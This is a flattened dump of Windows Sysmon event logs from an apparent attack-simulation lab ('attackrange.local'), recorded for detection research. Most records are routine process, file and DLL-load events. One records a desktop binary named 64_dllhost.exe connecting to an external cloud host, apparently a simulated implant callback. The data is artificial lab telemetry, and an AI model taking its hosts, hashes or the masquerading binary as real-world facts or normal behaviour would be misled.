19:19:01.532{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095351Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:01.040{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0094692D8AE8A6B6845EC70AAC96F56,SHA256=CDCF13C77579CA8D17263EADBCFE51F504A4320F51BE03BD5CAA231C944D8542,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606672Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:02.119{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606671Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.119{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E9AE2F20F7D5040B70BC9AA3FFC40AF,SHA256=4CDD41B316CD96C169A68B2C0A4098A645DF8375DAA5D85CF89B407DAC0AEA7Cfalsefalse - insufficient disk space 354300x80000000000000001095358Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:58.438{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1165-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095357Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:02.533{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095356Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:02.533{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095355Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:02.046{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A5388CCFA9A477E9E5E0D94D8CD76F4,SHA256=02DE352EA862646753D7405E64330D72D4F945923E9CE7752946ADC4CFE9C6BC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606670Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606669Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD1F1147D1D793939BC56600578BA460,SHA256=59DFD2FBCB98C938E076B44539A6B83C8C9887973FE6CB8D46379A7D9D3877C2falsefalse - insufficient disk space 
11241100x80000000000000001606668Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606667Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26211F6EB429C67CE4494899646FD09A,SHA256=865D02890602891040F572D8AF9507549AE25DD0941C1FED8A7D7F297BD29999falsefalse - insufficient disk space 354300x80000000000000001606675Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.613{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49738-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606674Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:03.121{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606673Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:03.121{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD901B8359236CC5117A738F2DAE6AA,SHA256=CE131C7E9B271E4F1E85DAD873DDD10167590A168AEE30F64D6991ABE641D966falsefalse - insufficient disk space 10341000x80000000000000001095362Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095361Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095360Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.064{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C4DCA14B2B9B5D4BC1A716D329B8FDFC,SHA256=292C779B657773EF9813197F518E742A13B081F7110BF470D60980278715FE2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095359Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.052{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E4FFD1E56BB67C9E7F96A855BF42C0B,SHA256=9F124DD5EBA1C0B823FE34E65743672CB35FDC0B6F3D980EA11F2441D69F44D8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606677Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:04.140{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606676Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:04.140{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C378FC0C3E40A686B68BAF0EE6B724C1,SHA256=7D73DC2EFD0E98ACCEE97EE7C4A10C437711C8EFC6BFDC6775B8B5DC0F23B917falsefalse - insufficient disk space 354300x80000000000000001095366Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:59.609{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1166-false10.0.1.12-8000- 
10341000x80000000000000001095365Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:04.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095364Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:04.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095363Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:04.055{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F51CE969966F98ED6F5EC94F87595D8,SHA256=48941A87E7F4B81D618ABBB0F38D16A9B6F4AD3E76AF15D39B6BE8AED021F743,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x80000000000000001606679Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:05.276{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606678Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:05.275{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAC4913963BA3E9037DA1B14841D3074,SHA256=2BF3737446290E03DAD8F4711EEB84A3B316E0415C392EA19E54DAFF6B46430Cfalsefalse - insufficient disk space 10341000x80000000000000001095372Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.836{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-818C-607D-1500-00000000BA01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095371Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:05.835{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-818C-607D-1500-00000000BA01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095370Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.835{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-818C-607D-1500-00000000BA01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095369Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:05.535{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095368Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.535{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095367Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.063{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A07FA38B61BE02F2621C3539DCC21C7,SHA256=E6F0D19155D9A9BA885B429F1F32256F9EC3B993BE017FBEB4818A8CC60A4751,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606687Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:06.430{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606686Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.430{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1A1BC1C6C8465E98FC0B8F61F8F7BB,SHA256=4097BAC29774A0A4987F1A6B5784FC958148F741F858BF5597DBE3579706586Ffalsefalse - insufficient disk space 23542300x80000000000000001095374Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:06.568{761B69BB-A4A5-607D-9A08-00000000BA01}6816ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wcognp7t.default-release\datareporting\aborted-session-pingMD5=273E60B225465DEC1732BD148A87845F,SHA256=2B359AFA292DF6193DD6055FBDD8F27BE2CA17822F2365EE92E5F3E05617C952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095373Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:06.072{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D8FB2C4A520E6D8160DF5B966F22DA2,SHA256=D0CD4261BDA3D87DD2BE8720B46A12D7650EE3DC172A0B62EEEAEF29FBEDB474,IMPHASH=00000000000000000000000000000000falsetrue 24542400x80000000000000001606685Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.282{21761711-84C8-607D-EA00-00000000BB01}3720C:\Windows\System32\rdpclip.exe2user: 
WIN-HOST-5\Administrator hostname: mj0b0drgMD5=9950A34F241270B2AF33BAF78182DDFA,SHA256=1F5296A83A5D1C210C3E8E57AFE1D1EEABB8BBB07030740946BB525ECBD725E9true 10341000x80000000000000001606684Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.282{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1D00-00000000BB01}1960C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606683Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
734700x80000000000000001606806Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.384{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606805Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.383{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606804Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 10341000x80000000000000001606803Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-84C5-607D-E100-00000000BB01}32203420C:\Windows\system32\csrss.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 
734700x80000000000000001606802Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606801Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606800Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606799Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 